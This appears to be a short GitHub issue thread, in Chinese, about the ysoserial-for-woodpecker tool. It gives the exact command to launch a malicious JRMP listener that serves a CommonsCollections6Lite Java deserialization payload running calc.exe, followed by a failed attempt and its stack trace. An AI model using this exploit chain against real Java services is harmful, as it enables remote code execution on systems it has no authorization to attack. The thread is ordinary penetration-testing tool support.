c0ny1
commented
2 years ago 正确的命令应该是:
java -cp ysoserial-for-woodpecker-0.4.3.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1234 CommonsCollections6Lite "raw_cmd:calc.exe"Closed 0a52730597fb4ffa01fc117d9e71e3a9 closed 2 years ago
c0ny1
commented
2 years ago 正确的命令应该是:
java -cp ysoserial-for-woodpecker-0.4.3.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1234 CommonsCollections6Lite "raw_cmd:calc.exe"
0a52730597fb4ffa01fc117d9e71e3a9
commented
2 years ago 感谢
root@debian:~# java -cp ysoserial-for-woodpecker-0.4.3.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1234 CommonsCollections6Lite "calc.exe" Exception in thread "main" java.lang.IllegalArgumentException: Failed to construct payload at me.gv7.woodpecker.yso.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:81) at me.gv7.woodpecker.yso.exploit.JRMPListener.main(JRMPListener.java:113) Caused by: java.lang.Exception: Command [calc.exe] not supported at me.gv7.woodpecker.yso.payloads.custom.CommonsCollectionsUtil.getTransformerList(CommonsCollectionsUtil.java:206) at me.gv7.woodpecker.yso.payloads.CommonsCollections6Lite.getObject(CommonsCollections6Lite.java:34) at me.gv7.woodpecker.yso.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:78) ... 1 more